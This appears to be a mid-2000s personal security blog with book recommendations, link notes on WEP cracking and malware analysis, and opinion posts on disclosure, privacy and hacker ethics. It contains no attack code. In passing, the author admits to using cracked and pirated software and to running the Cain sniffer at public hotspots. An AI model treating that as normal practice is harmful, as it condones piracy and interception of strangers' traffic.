Applied Cryptography by Bruce Schneier
Any book that the National Security Agency prefers to remain unpublished is bound to make great reading. Anyone doing serious work with cryptography needs a copy. With a comprehensive and excellent explanation of encryption of all kinds, this book is second to none.

Practical Cryptography by Bruce Schneier, Niels Ferguson
Schneier's sequel to Applied Cryptography will help you apply your newfound cryptographic skills successfully and securely. Think of them as volumes one and two of the same book.

Practical Unix & Internet Security by Simson Garfinkel, Gene Spafford, Alan Schwartz
The authors deliver an excellent introduction to a wide variety of computer and network security issues within UNIX.

Security Engineering by Ross Anderson
This book details security design and implementation strategies employed in real-world systems. Although many publishers employ strategies attempting to inflate the page count (and price) of a book, this 600-page masterpiece could only result from the dedication of an extremely knowledgeable veteran of the field.

The Tao of Network Security Monitoring by Richard Bejtlich
"Tao" means "The Way," and that's what this book is: the way to evolve IDS operations. The network security monitoring philosophy is both obvious and completely revolutionary.

The Art of Computer Virus Research and Defense by Peter Szor
Szor's mastery of virus/antivirus technology is unparalleled, and this comprehensive tome is the definitive work on the subject. Although parts are inaccessible to all but experienced assembly language programmers, antivirus is such a critical technology that every professional should read this book, if only to understand the problem.

A Guide to Forensic Testimony by Fred Chris Smith, Rebecca Gurley Bace
As security pros, we stand a higher-than-average chance of being called into court to testify about the results of our investigations. The authors do a good job of explaining the challenges associated with information security cases and how to give the best testimony possible.

Spam Kings by Brian McWilliams This behind-the-scenes account of real-life spammers and spam fighters is a must-read for anyone trying to squelch junk e-mail. There's a freak show in here, but also a lot of good intelligence on the inner workings of the spam kings.

And Richard Bejtlich's Top 10.

I was going to post a nice list of wireless certifications and courses, but this site sums them up better than my list would do. Definitely took in all the ones I had unearthed and more.

Dan Morrill posted a list of his top 10 information security skills to have. I really like this list, and it certainly gives me something to use as a benchmark than just what appears on my resume or certs I might hold. Considering Dan manages teams like this make him the best opinion out there, really.

Getting start with the Cisco Pix firewall

Pix failover demystified

This little trick is not necessarily wireless-only, but awesome nonetheless. Using a proxy and some other tools, one can mess with http traffic to unwanted wireless guests such as turning all images upside-down, instead of just outright denying them access. Pretty cool and fun! Reminds me a lot of airpwn, only this would be a wired version using squid.

A nice presentation on wireless security. Pretty nice detail on what is going on.

I have a ton of respect for Prolexic and what they offer to our world. But the spammers and botnets have waged a mini-war against Blue Security and anyone who seems to assist them. But instead of directly attacking Prolexic, a botnet was leveraged against upstream DNS servers for UltraDNS. Wow, just wow. This is the sort of cyberwarfare that is coming or already here where masses of zombied computers are wielded. So far much of this has been individual hackers or groups with personal beefs, but much like phishing and virus attacks, I expect things like this to take a much more organized and sinister turn in the next 4 years.

Sometimes you just need to inject some "security awareness" points into your training program. "Protect Your Workplace" posters from the federal government are an inexpensive and easy way to start.

And search this page for the security calendar.

This presentation on wireless injections was given in June 2005 at RECON. Powerpoints without presentations tend to be pretty barren in terms of being able to get the just of what the speakers is trying to say, but might be ok to check out someday.

It is interesting to see the trend of what is hot in security and networking and sysadminness. The turn of the millenium brought in virtualization, and a few years ago Metasploit broke onto the scene in a big way. Wireless and mobility have been amazingly hot in the last 6 years as well. And now that web apps are being developed by everyone, web app testing and security is catching up. In all of this, I thought it would be nice to keep track, for my own purposes, the hot topics at periodic times of the years just to see where things are moving and shaking.

1. web application / layer 7 security / fuzzing - driven by a huge focus in the past 8 months on MS Office vulnerabilities and browser exploits.

2. mobility - driven by laptops being used and lost in the field, prompting a huge number of disclosures of lost information that questionably should not have been outside the corporate/gov't environments anyway.

3. disclosure and identity theft - Just about everyone has been joining the disclosure bandwagon whether they like it or not, from the VA, Deloitte and Touche, and many universities (poor edu's will always have a tough open vs secure battle). This will only get worse and hopefully soon the media stops waving each one that happens.

5. botnets and ddos - Blue Security wanted to beat spammers by spamming them. Instead, Blue Security got DDoSed so hard, they are now out of business and have thrown in the towel. Botnets have been widely reported in the past couple years, but they still seem to grow and remain huge and potent.

4. wireless - wireless is just waiting to blow up, with hotspots getting more common and big companies with secret plans on widespread wireless for the masses. Since wireless is still hugely exploitable and fun to mess with, this is just waiting for a huge lashback and a huge outbreak in personal systems being exploited over wireless. Home users haven't been this vulnerable to being rooted since NAT was hardly used on broadband connections. This is an area that is also just waiting to explode with use and companies and wirespread access.

Mentions and tools: Metasploit is still hot and HD Moore is one of the biggest names in security right now; virtualization is still hot; Office and IE are getting hammered with exploits which is keeping Microsoft very busy; LiveCDs are all over the place now, joining the awesome Knoppix (BackTrack owns).

Tutorial on how to crack WEP using Ubuntu.

You can search for malware using Google, right down to infected sites inadvertantly sharing out malware code (executables). Damn cool stuff, and damn cool site. Search for "Bagle" for a good example.

I need to check this out sometime. The packet challenge at SANS is not a regular thing, I think, but could still make for an interesting exercise for me. Bejtlich posted a couple links to answers here and here.

Not sure on the quality of this content, but this site has some modules up about their training in infosec assurance and assessments. I'll take this down if this proves to be useless fluff.

So, when I get around to testing my linux firewall, I can use ftester along with this "how to" guide.

The folks at F-Secure put up this series of exercises in reverse engineering and called it a khallenge. Sounds like a fun way to get into reverse engineering a bit, someday. If I get stumped, might be able to find some hints around this blog.

A post over at SecurityFocus went over Microsoft Office forensics and some things to do to enhance security, most notably privacy. Because Office is so universally used, I've found that many people, techie and non-techie both, want to put their heads in the sand about issues with Office. They just don't want to hear about the issues, even as malicious persons have begun poking at the apps and more and more data is disclosed on the web and search engines.

I've long wanted a concise and listed set of items to check on and change when dealing with metadata in MS Office Word documents. Now I have it!

Update: Here is another link dealing with pesky lingering Office data that shouldn't be there.

Quite an ingenious simple little method to hide files on an ntfs disk: alternate data streams. This article on Security Focus makes it look a little more difficult than it is, due to the author going through the effort of describing breaking into a machine to set an ADS on a few hidden files. LNS and LADS are two tools to scan a disk for ADS...although they are certainly not swift in their scans.

Update: An ADS tutorial from STC

If one must absolutely use passwords with Windows (not sure why anymore) and not pass phrases, and the password needs to be highly secure, you don't get much better than using non-printable characters. Both of these posts go into detail on using non-printable characters to thwart most password cracking tools.

Microsoft, of course, even weighs in on their password suggestions.

Every now and then the SANS Handler Diary offers up some nice information. They just threw out this list of switch features that many people never know to use, and I thought it was a nice rundown to use at a later date, especially if my two switches include all of this stuff.

This link has a number of good pages and pieces of information on cracking WEP and other wireless fun.

Just a quick listing of some secure USB drives that use hardware encryption and are recommended:

mtrust mdrive 500
kingston data traveler elite - privacy ediction
verbatim store'n go corporate - secure

This is an analysis of Mocbot from LURHQ. Especially interesting is the follow-up on the Spammer that this new variant downloads, as well as the graphic showing which antivirus companies properly detected the malware. I wonder if the only ones detecting are the heuristic scanners and not the signature-based scanners...?

Not sure what to make of this yet, but sounds like an awesome little tool. Lurhq pimps this as a "sandnet" where you can run malware and it will even get its own little "internet" to play with if it chooses to connect out. Sweet action!

This paper purports not only to help cracking wep, but to be the final nail in actually outright breaking wep. I've not read this yet, but plan to as this sounds like a very swift, albeit technical, way to break wep.

It really sucks when users think they're being cute by utilizing remote control services to connect from home to work or work to home PCs. These just are not cool, especially when used without permission. I always forget the sites, though, so this will start my list of sites to blacklist on firewalls/web filters whenever I set any up. These are not wanted in the corporate sphere.

GoToMyPC
LogMeIn (and secure.logmein.com)
Hamachi - p2p?

Hamachi is a particularly scary thing, but like Skype, it should require a common mediation server to get the two endpoints together, and therein lies a single point of denial on firewalls. Either way, novel idea, and something I'd like to check out on my own. If even the mediation is peer-to-peer, we should be marking the app as a highly bad app, kinda like an irc client...

Foxy Proxy has some excellent tutorials as well as the proxy stuff.

This link goes to a Microsoft doc about Windows XP Countermeasures and Threats. Of particular interest, Chapter 7 makes an excellent reference on the services that Windows XP has, and whether they are necessary or not. Disable them if they are not necessary.

I've already gotten them, but this will just be a placeholder position for links to this years defcon 14 and black hat 2006 papers.

This was a nice read about job interviews. I believe Google also did this sort of interview tactic, especially the "impossible question" part. The biggest takeaway from this for me is the Smart and Gets Things Done. I think this is something I, and many people I know in IT, lose sight of sometimes. Get things done.

Law #1: If a bad guy can persuade you to run his program on your computer, it's not your computer anymore

Law #2: If a bad guy can alter the operating system on your computer, it's not your computer anymore

Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore

Law #4: If you allow a bad guy to upload programs to your website, it's not your website any more

Law #5: Weak passwords trump strong security

Law #6: A computer is only as secure as the administrator is trustworthy

Law #7: Encrypted data is only as secure as the decryption key

Law #8: An out of date virus scanner is only marginally better than no virus scanner at all

Law #9: Absolute anonymity isn't practical, in real life or on the Web

Law #10: Technology is not a panacea

May as well get this one off my chest early, and try to keep it short and simple. I really dislike when people spit out that "security through obscurity is worthless." I've read this a lot and heard it in person a lot too, but it is often misused. What is really meant is "security through obscurity alone is worthless." Defense in depth benefits from security through obscurity. In a way, one could argue that passwords and theoretically reversible encryption is just harder-to-guess security through obscurity. The biggest benefits of security through obscurity would be twofold:

1) Eliminate a lot of the casual kiddies and scripted attacks. Running a vulnerable web server on port 1800 does not make the web server less vulnerable, but does limit all the scripts and kiddies who only look for web servers on port 80. You can at least limit your threat exposure.

2) Force determined threats into expending at least a little bit more energy and time to find the obscurities and work through or around them.

Alone, though, security through obscurity is more of a false sense of security than anything, even though the above two benefits are still there, no one should ever sit back and breatht easy by having security only through obscurity.

(Points for me to think about: Does this mean brute-forceable passwords and encryption is, in the end, worthless? Where easy passwords and DES were years ago "unbreakable" they are now accepted as flawed...as processors continue to speed up, will today's standards eventually be scoffed at the same way? What can stand the test of time, biometrics? Or are passwords or at least encryption the standards we will always have to live with? As long as we have networks that have to communicate and trust, will there always be hashes or an exchange of keys that at some point is vulnerable?)

I just received email from a vendor I have dealt with in the past, ScriptLogic, whose simple tagline got me thinking: "Can you prove your IT environment is safe?"

I think I need to post that in my workspace at home and use that question as a basis for what I do in security as I move forward.

"Well, you know, it's a toolbox, I don't care. You put the tools in and do the job, that's all." - Sam, Ronin, when asked what kind of gun he favors.

This is not so much a security pet peeve as it is a general geek pet peeve. I really do not mind discussions about operating systems and the benefits and drawbacks of each, but the eventual bashing and impassioned arguments that can result from talking about Windows vs Mac vs Linux vs Debian vs OpenBSD are amazingly unnecessary and unwanted.

When it comes down to it, the biggest factor in the security of each OS lies in the operator. I think they each have their own place. And I dislike seeing a Windows user completely refuse to learn Linux just as much as I hate seeing a Unix/Linux user be completely useless in Windows.

And let's face it. All of these are going to be part of a security or IT person's life at some point and we'll have to at least be exposed to Macs, Windows versions, Linux boxes, etc. So basically live with it, and move on. My current job is 99% Windows, but my last job had a couple Macs, many Windows boxes, and some of our critical infrastructure systems were Linux (firewalls, DNS servers, monitoring servers, syslog...).

On a more personal note, I have used Windows versions since 95 (all but ME) and still run Windows XP today for the most part, pretty much just for easy wireless and World of Warcraft. However, I love tinkering and learning Linux versions (especially security live cds) and my next computer purchase will be a Macbook Pro. Someday after I get my Mac, I will convert a third oft-used laptop or desktop to be a permanent and oft-used Linux box so that I can really learn that as I also learn Mac. Eventually, I want to use Linux or Mac full-time, and only move to Windows for my work machine (most likely anyplace I work will provide only Windows XP, I bet), for gaming, and just to keep current on Windows (such as when Vista releases). Of course, my lab will always have a number of Windows boxes performing various roles.

I applaud how far Apple and especially Linux have come over the years to bridge the gap so that the only things I will not be able to carry over to Linux from my Windows world will be games. Even wireless is getting to be easy enough...

DefCon and Black Hat have become the premiere security events of the year. Not only are they amazingly fun and informative, but some of the biggest security and insecurity news of the year is now coming out of the minds of those in the culture.

In the last couple years, the dotcom bust gave way to the slow maturation of web-based application delivery, and it is now shooting off quite rapidly. Web-enabled apps have been the buzzword in development for the past two years. In addition, the browser wars with phishers, spammers, and scammers has heightened and browsers are more and more under the guns and fuzzers.

And now, it's happened. Javascript has been demonstrated to be able to not just screw with a local system, but also penetrate the local network that system is on.

Wow.

Ha.ckers.org made an excellent post that beats anything I could say. But I will add that if someone has presented it to us now, there is little doubt that these techniques have already been in use by the underground.

It is a statement about the security of Windows that I have a series of apps I install on any personal Windows XP build that I perform, just to secure it more. I won't leave home naked, and a Windows box by default being naked exemplifies what is wrong. I was going to post them for my own edification, but have decided to expand this to a listing of some of my favorite tools that I pretty much have on any XP system I build.

First, the initial security, after patches. I use ClamWin Antivirus because it is free. I use a cracked version of Sygate Personal Firewall instead of the XP firewall. I have also recently started trying out an app called WinPooch for digital integrity, ala Tripwire only free (I expect this to be bought up). I also install Mozilla Firefox and Thunderbird (with Enigma for PGP), not so much for esoteric purposes as for security purposes anymore. While investigating a friend's hijacked AIM account two years ago, I discovered a version of the HTA exploit in IE (still unpatched, I think), and thusly conversed with the hijacker directly about it before getting my friends AIM acocunt back. Since then, I've never trusted IE at all. That was the breaking point. The only way to notice of stop that web-based attack against IE was to be running a personal firewall, at the time Zone-Alarm. Otherwise IE was rootable with no user intervention or notification.

In other apps, I have moved from my purchased version of Trillian over to Gaim, due mostly to having used Jabber in my last job and Trillian was slow to adopt. I use a pirated copy of Microsoft Office 2003 (includes everything, Visio, Word, etc). I always move over a bunch of Sysinternals tools as well (pstools, process explorer, tcpview, regmon, and filemon). A cracked version of WinZip 9 gets slapped in pretty quick, as does a free copy of WinAmp (classic mode please). WinDump, WinPcap 3.1, and Wireshark also get installed.

If this is a wireless laptop, I always throw in Netstumbler and Cain. If I am at a wireless hotspot, you can bet I am running Cain in the background (and for this reason, I am very aware of what I myself do at hotspots because I'm not a special hacker or something, I'm a regular guy and if regular guys play with gleaned myspace and email accounts...).

After that, my toolbox gets a bit more murky depending on the uses for the particular box, but pretty much all of the above are part of the 'settling in' process of a new system. Of my few cracked products, someday once I am out of the 'cash-strapped college boy' phase and into a solid, fair-paying job that keeps me happy, all of those may be replaced with legit copies.

I've been pretty conscious lately of where my personal information goes. I've been interested in staying anonymous for a blog and mailing lists, so my mind is kinda turning that problem over. In addition, with this year's heightened problems with indentity theft and disclosure of personal information from places like the VA, every time I fill out a web form, my mind flitters over the thought that here is yet another place my personal information resides, ready to be indexed, stored, stolen, and used.

Just yesterday I submitted a job application to a company in the Seattle area, and at the bottom was a credit report disclosure form complete with social security number field. I immediately glanced up and noticed that the site had no SSL functionality on this particular form. I was a bit annoyed, but at least I was completing this form from my home network. If it had been somewhere else, I would have fully aborted that half hour of effort.

I order books online and provide credit card numbers. I renew my World of Warcraft account online, and there is more information. I submit less information to many sites that require logins, including job sites and corporate sites that want me to log in just to store my resume (so they say). All of this is like trying to hold so much sand in one hand...just think, all it takes is the least secure online store to be broken into and the data siphoned away...such as that site I ordered incense from recently. I wonder if that non-chain, local store has a security guru making sure their site and data are secure?

In the end, I just become more sympathetic to removing the "convenience" of sites "remembering" my account information so I don't have to put it in again for subsequent purchases I may or may not make. I think data retention of that nature should be disallowed, and transaction logs in databases expunged on a regular basis or just stored on offline, secured media. If I only had to worry about the actual transfer of the information from my system over my network, my ISP, the Internet, to the vendor, I would feel a lot better than to have account and login and payment information stored by said vendor... How often do I let a restuarant keep a copy of my credit card and signature so that I can realize the convenience of not having to reach into my pocket to get it out, wait for the return of the waitstaff, and sign the slip?

David Maynor and Johnny Cache presented at Black Hat last week about an exploit against wifi drivers in an undisclosed but likely large number of wireless cards and operating systems. This has caused a minor furor amonst, well, pretty much everywhere somewhere.

Some argue that the duo are sellouts because they did not fully disclose who was affected at a "full disclosure" conference. Some argue they were protecting companies. Some take cheap shots at the video-taped demonstration for various reasons (which was done to prevent users from capturing the attack over the air and using it).

Last year Michael Lynn challenged Cisco and even his former employer ISS when he gave his presentation on a big Cisco vulnerability, after Cisco refused to fix it or even acknowledge it for quite some time.

Lynn's example brought up the age-old argument I see far too often in information security: disclosure. What is proper disclosure? Should it be full disclosure? This year it is back. Should Maynor and Cache have revealed the affected chipsets and vendors so that users could stop using them until a fix was in place?

I don't think there are any right answers, but the vultures that love to peck and squabble and argue for no real reason are back at it.

Bottomline, if these two found this problem, there are likely other people who have found out and kept it secret or sold it in private. This exploit was probably found via fuzzing of some type, since that is turning up lots of fun stuff lately. And I can only imagine the fun you could have as a spook or criminal with this sort of exploit in your hands and no one knowing about it...

I have a more private site that I keep as my own private little portal to security news, virus information, resources, tools, links, papers, and on and on. Every now and then I add a few sites to my links and remove a few defunct sites.

But every now and then while browsing news, I read on some site that "so and so" has more information, or "from the site of such and such." And I end up following 5 links deep to 5 different sites all reporting on the same news tidbit. Then I realize what has happened and I say to myself, "wow, there's a ton of blogs and news sites for tech news and opinions" (as I type one out here myself!). I wonder how cut-throat some of these link-relationships get? I've seen blog wars where someone feels they didn't get credited or where people of differing views post in their blogs their reactions and then wield their viewers and commentors like some botnet to swoop on the other and comment-spam them, escalating the all-out blogosphere war. Ugh.

It is sobering the effect of the web as a way to express oneself, to self-publish, to create, to share, and share with. Even the most stubborn hermit still has that need to share his or her thoughts with at least one other receptive person, and the web is such an easy outlet to masses. There are times when I feel like heading out to the mountains, just me, nature, spirituality...and an Internet connection. :)

I used to run online gaming league/tournament/community sites, and I know the amount of effort and dedication it takes to keep something popular on the web. It was tough 5 years ago when I finally "retired" from that, and I can't imagine how much tougher it is now, especially when you're not just offering up something unique and fun like digg.com. Then try to find all the digg copiers or slashdot wannabes or every other blog out there that tries to act very self-important and get fans and followers. People like me who add that blog to their short (but growing) list of weekly visits. I can't imagine how tough it might be to always put up meaningful content, opinions, and original substance on a technical blog or tech site...especially for me, someone who does not yet have something unique or original to share (someday, I think so).

But then I look back and see why I post here or even on my personal site. It is much the same way I might keep a journal (girls call it a diary, journal is more manly) next to my nightstand or in my backpack. It is a way to document my thoughts, and also comment on and document news stories. When 9/11 occurred and every blog in existence posted comments, it was not all because they wanted to be part of the news megasphere or get readers or even self-publish. That was an important event in their lives, more than worthy of being in the journal...only today's journals are more able to be public and commented on. I definitely need to lighten up on my lashback of the blog effect on the web.

At any rate, there are blogs and tech news sites all over. There are weekends where I grab something warm to drink, and spend the morning or evening following the blog links. It is much like roaming down an unknown state park path, taking in the sites. Click a link, check that person out, look at his or her link list, pick another that looks interesting, and just roam randomly. Sometimes I pick people from Iowa, sometimes security/hackers (I love wandering into the sites of people whose names I might recognize from the scene, but who have grown up or moved on and their site remains as it was 5 years prior...), sometimes just random people with cool site designs or ways of writing. Sometimes I am looking for new people to add to my bookmarks, sometimes just checking out site designs for inspiration, sometimes just bored.

I wish I could keep up with such a huge community, but there are not many jobs that pay for that kind of a hobby, and in all honesty, I wore out my "online life-living" back in high school and college with IRC, IM, forums, gaming, and other things not worth mentioning, and it really never got me all that far anyway. As it is, I am one of those people who just looks for useful and meaningful blogs and sites to bookmark on my private page, to visit again over the months and perhaps even pipe in and comment to the author, perhaps making a friend or colleague in the process. It is always a sad event when one of my links gets removed, either from lack of updates or lack of updates that are useful to me as either I or they have moved on to other topics or phases of life.

For those that know what it means, I'm feeling just a bit QQ today. :)

At first there was innocence, ignorance of the needs of security in networks during the days of the open networks, where network downtime and intrusions were borne more by discovery and accidents. Then there came playfulness, where security was beginning and attackers made more curious, playful attacks, toying with users or just crashing systems to see the effect.

Then came adulthood, maturity. Now, attackers are not necessarily interested in downtime or playing around. They have an agenda and they have profitable goals. Suddenly, we have maliciousness...

The old adage can ring true for online habits: "Don't do anything you wouldn't want your grandmother learning about." Long hailed as a place to conduct oneself with a wide measure of anonymity (read how bold kids can be in chat rooms or online games when they don't have to face people in person), we're all starting to feel the creeping implications of data retention policies, particularly illustrated recently by AOL's search data release.

It is a bit sobering. I have been online in some form or other since the early-mid 90's when I was barely into high school. Granted, Google was not around, but AOL sure was. And I used it, and searched using a number of search engines available at the time. How could someone like me know that 10 years later, data retention and search engine query analysis could reveal some dirty little secrets?

Not that I have much to hide, but it is still offending to have that sort of privacy illusion (?) yanked away. Have I searched for porn online? Yeah, I'll admit it. Have I searched for some not-so-legal things such as hacking or bomb-making just to see if I could find it? Probably. Have I done an ego-search looking for my own name? You bet. And have I done all of those, in some combination or other, from the same IP? Considering I've had only a handful of IPs in my online life (not counting AOL dial-up in high school), the chances are really darned good.

Scary. Just think the dirt that may be dug from such databases on politicians 20 years from now. Our president in 40 years may have an old MySpace site still lingering there, waiting to explode with traffic from mudslingers.

Step back and take that one place further. What about spyware/adware apps which remain dormant and diligently reporting user surfing habits to central servers, maybe years while users just silently huff and deal with their slowly ailing computer speeds. Or ISP traffic records that might be kept some day. Just think of all the places visited from just the one location. This now includes work-related websites, sites for stores in the area (ever look for the most local Mitsubishi dealership or the working hours for the local Papa Murphy's Pizza?), and even the things you'd not want your grandma to know you were viewing online. Even people like me who maintain a moreorless anonymous presence in security/hacking venues would be outed.

Then again, some may argue this can be good for the morality of the Internet. I remember a long time ago a study was done where people were put into a room to socialize. Later other people were also put in the same situation, only this time the lights were turned off. You can imagine the remaining senses were used, but they were used to a degree that almost all of the people in the room wouldn't have used them in broad daylight. Use your imagination. :) Maybe with the veil of anonymity removed, people will behave better? Naa...I just think they'll try all the more passionately for anonymous services, onion routing, VPNs, and privacy standards.

A career in information technology is a career in lifelong learning.

A career in security is a career in lifelong learning.

Sometimes the obvious things are just not consciously obvious, and once they become obvious, things just "click." That was a click there for me this morning, for some really odd reason. And I'm just glad I love learning both academically and on my own.

Today I happened to get called a "black hat" on a blog comment simply because of some off-the-cuff comment I made that, admittedly, is not necessarily a straight-laced, stick-in-the-mud, ne'er-do-wrong practice. However, me being called "black hat" is about as laughable, as, well, anything else I've experienced this week so far...

But it illustrates to me one of my other big pet peeves in security: hat color.

Fashionistas aside, some people are pretty obviously Black Hat. The rest of us are pretty much stuck in a quagmire of uncertainty and greyness that really has no definition. What seems like grey hat to some may be very black hat to others; what may be white hat to some may be grey hat to others, and so on.

All of this is just so much drawing lines in the sand, only to have someone else wipe it away and draw their own line in the sand, and another person wiping it away and drawing their own line in the sand. It is all about ethics and morals and how you conduct yourself. And if anyone has taken any academic coursework or even any casual discussion on the subject of ethics, one will quickly realize there are no hard and fast lines. It is all very relative and all very undefined to such a degree that arguing about it is a complete waste of time.

As it is, I have no problem with most "black hats" or "white hats" or anyone in between. Each can live their own life and that is fine with me. But what really incites my pet peeve is when people get so ensconced with rage and prejudice and blind ignorance about the whole issue of ethics that it manifests into nearly fanatical knee-jerk reactions to any hint that there might be an ethics or hat color discussion arising... That is just shallow.

White hats have to live up to a certain level of ethics and morals, right? Well, how do they feel about speeding when driving? If it is a 30mph zone and they drive 32mph, do they feel guilty? Does that guilt adjust their behavior back down to an apologetic 30mph? Do they regularly bump 10mph over the limit, whether in residential or on the freeway in the throes of a 10 hour road trip?

This is the dilemna. This is the grey area.

There are way too many news sites and blogs out there that I want to read. I'm at a phase in my career where I'm just sponging up everything I can. I have a growing list of sites that I use for resources and news and new stuff.

The problem is trying to manage it all. As I have gotten older, I have realized the grim reality of managing one's time. In my youth and even in college, I had a lot of free time to just while away doing nothing much. Now, I find I have to sacrifice a lot of that "nothing much." Thankfully, I shed the whole "tv watching" thing back in college, and unless it is a movie, my TV gets zero use.

Likewise, unless I'm relaxing for a few many hours on a weekend with my computer, a hot drink, and some calm music, I don't get a chance to check all the blogs I want to check or network with the people I want to network with or try all the new things people have posted about or created. Ugh!

I've tried keeping my own private blog with a list of all the interesting links and then posting about the tidbits I wanted to keep available or braindump about. The posting part has been working amazingly well and I love it. But the links part, which ends up being just a web page of bookmarks, in essence, is something that I have a bit of a problem with.

Reading the news requires clicking on each one. Being that I want this page to remain private, reading at a hotspot or at work can reveal its presence, and I have to take extra coding measures to obfuscate the redirect trackback. This is just a little bit annoying. And if I ever did want to share its existence with someone else, that would mean also sharing my home web site, since they share the same IP (and box). Moving it to hosting is a bit of a chore as well, since I use a smaller, lesser-known perl publishing tool for the site content. Ideally, I would have a second IP just for this site...maybe in the future.

But reading the news there is still less than ideal.

I've tried out standalone RSS readers, and I settled on using RSSReader for a while. Unfortunately, I find that I'm not always on my home laptop in such a fashion as to pull up the app and read the news. Sometimes I'm at work, sometimes I'm in a live cd doing something else, and sometimes I just want one big long page with all the news right there so I can just scroll on down effortlessly. The one good thing I like about RSSReader? If I have populated it beforehand, I don't have to have an Internet connection to read the content later. That's really a big plus as sometimes I want to go someplaces that don't have open wireless and sometimes I just don't want to fuss with locking myself down a bit more at a hotspot.

I just started a Bloglines site yesterday and have begun populating it with news and blogs and vulnerability advisory sites. While I like the idea of a one-stop website I can go to for news, this still does tie me down to an Internet connection. I also have not been happy with the presentation of the feeds either. I like to have full content (unless fully overridden by the feed itself), I like to have posts parsed chronologically (not by site only), and I like to have them all displayed for at least a week back for blogs and less for others. With Bloglines, I've found I have to click a few times to get the Week view, and they never arrange in full chrono order. Hrmm...but I do like it for one-stop news while at work and at a hotspot. I can also maintain some anonymity there.

Maybe I should recheck RSSReader for some more view options. Other than at work, it really is a good option, as I really love the freedom to unplug somewhere like a park, and just browse news there.

The big downsides to RSS feeds? Easily, I dislike the oddball blogs or sites that have no RSS or non-compliant RSS. Some, I understand, are a functionality choice that was consciously made by the author, and that is fine. It is just hard on someone like me to remember that that site is an oddball. A new downside that is growing in popularity is the trust that apps and sites and people put into parsing RSS feeds that can possibly allow malicious code in feeds.

Someday, I also need to find a good way (on Windows and preferably without iTunes) to automatically download podcasts and load them to a folder that I can sync with my iPod. Yeah, I know, I might still be behind the times, but iTunes originally was not something I trusted on my box, so I always stuck with winamp to manage my iPod. For now though, I'm content with my site of links to pod/vidcasts and downloading them manually.

Forums I truly love. I like the usually informal and discussion-like format of a forum. Maybe it just reminds me of IRC days, but forums have a special place in my heart. Sadly, finding a well-populated one with useful information is definitely not easy to find. My list of forums is woefully small, and half of even them are filtered at work.

My last major source of information has been mailing lists. I started out getting on a number of busy mailing lists a few years ago with a gmail account, but found the web mail interface and my own lack of time very disappointing and as such I stopped reading them. I have only recently renewed my reading by pulling that gmail data down to Thunderbird and abusing filters to sort out the mailing lists. This has worked pretty well for me, but I still have yet to really work mailing list reading into my daily or weekly routine. I need to read them for a while, cull the useless ones, and settle down there. Having mailing lists post directly to a forum or blog (with thread REs being placed into comments) would be awesome, even if just for my own private viewing.

Anyway, these are just some ways I'm attempting to usher myself through this sponge phase of my career, and I can already feel it coming to a climax and settling down for me, which is very good.

There are a number of news publications and sites and posts that say things like, "organizations now need encrypted backups," or "spam is out of control," or "building a comprehensive disaster recovery plan."

I get a little happy when I see something like that, I and read into the article only to realize it is just one of those "obvious need" articles. These articles are great for new topics, but far too often they are already old news topics and offer me nothing on how to actually perform lots of these functions. Too often, I get the feeling these are written by people who can complain about the problem, but really have no idea how to fix it, nor have had any experience in what the challenges may be in encrypted all backups or trying to implement and company's first diaster recovery initiative.

So for the past month the IT world has been abuzz about how David Maynor and Johnny Cache demonstrated undisclosed attacks to root wireless laptops where they may or may not have used Apple's built-in wireless card or third-party wireless drivers for a possible third-party wireless card.

And look at where Maynor and Cache are now. In the middle of this summer's biggest IT feud which is spreading a feeling amonst the "blogosphere" that is worse than a smarmy, humid, hot, and never-ending day in the mosquito-infested bayou. Ugh.

All of this uncertainty has resulted in mudslinging, amatuer journalists (bloggers) having panic attacks, Mac fans up in knee-jerk reactionary arms, large corporations side-stepping issues, and quite a lot of upset and pissed off people all yelling at each other and only half-reading everyone else's posts before adding to the panic. And the only way to clear all of this up is for Maynor/Cache to admit they faked the whole thing (I don't think so), for Apple to admit they have been skirting the issue and finally take responsibility for it (I don't think so), or for the details to finally be released (after a fix, of course).

Until such time, we're all still left with uncertainty. But what I am certain about is our approach to "responsible disclosure" is going to be coming to a head, and I don't think corporations will be happy with the imminent conclusion.

Security practioners are paranoid people. They tend to not trust much, let alone large corporations. Hackers and the underground are far less inclined to trust corporations. This distrust promotes the use of full disclosure, whether or not you notify the corporations beforehand, although I suspect a majority of people will notify the target companies prior to full detail release.

Wireless issues aside, there was no real way for these two to publish their findings without incurring wrath from someone. I think they took the lesser of three evils, while they at least got their names out there and known in the industry.

Last year was Michael Lynn vs Cisco where Lynn finally came clean (or attempted to) with a big Cisco vulnerability which Cisco did not fix in a "proper" amount of time. This year we have Maynor and Cache with wireless driver attacks.

In the end, every security researcher is going to think three times about releasing code. I think this will lead to one extreme or another. Either vulnerabilities will be released to the highest bidder or to the parent corporation and not released until a fix released. Or exploits will be publicly released right away, giving the information to everyone at the same time. Considering security/hacking circles that are paranoid, a little untrusting of corporations, and very passionate about security/insecurity, I see the latter being the more likely.

Just thought this an awesome little idea for a contest. Defcon is definitely one of the most unusual and interesting security "conventions" around, as hackers and gov't security folks play contests that basically hone and demonstrate and teach security and anti-security skills. Quite amazing. In this contest..well..click to the article.

I am really toying with the idea of plunging fully into Linux...while also just testing with my toes again. Hrmm...

I've run Linux in the past, from Red Hat version 7 up to SuSE 9.x and various Livecd incarnations. But I've never been able to stick with an install for long enough to really immerse myself into it. Red Hat 7 was interrupted due to a need to do some resume/website work back after college when I was unemployed. SuSE was interrupted by my need for gaming...mulitiple times.

But the gap between Linux and Windows, especially the apps in Windows that I rely on a day-to-day or weekly basis, is greatly diminished now, if not gone altogether. The only real gaps would be ease of use of all the years of acquiring apps and programs to do certain tasks, the support for gaming, and the support for wireless.

The years of acquiring apps may be interrupted soon by Windows itself...who knows what Vista will be changing when it finally releases, but it will be a whole new world to learn anyway (although not entirely). The support for gaming has been getting better, but only slowly. Thankfully, having a gaming-only machine is not a bad idea, especially since any Linux that I run will not need beefy specs or expensive machines. And support for wireless has been getting better in leaps and bounds, to the point that some of my Livecds recognize my wireless laptop right from the install, and get online with absolutely no work on my part.

But, I do still game, and I do still have a lot of things on my XP laptop that I just can't part with quite yet, especially since it's the only machine that seems to accept any of my old Windows XP keys and licenses (damn Genuine Advantage, in the end, it will end up driving me away from Windows...).

So, one thing I really want to do is make sure I have Linux on a laptop, which does greatly limit my choices on my systems. I think I might give another shot to dual-booting or even just running VMWare Workstation on my laptop and carving out some space for a Linux install. I know my system is that all that robust (512MB RAM), but I think if I go ahead and wipe it off and reinstall Windows XP, it should be cleaned up enough to allow me to run a VM Linux (Ubuntu or SuSE again).

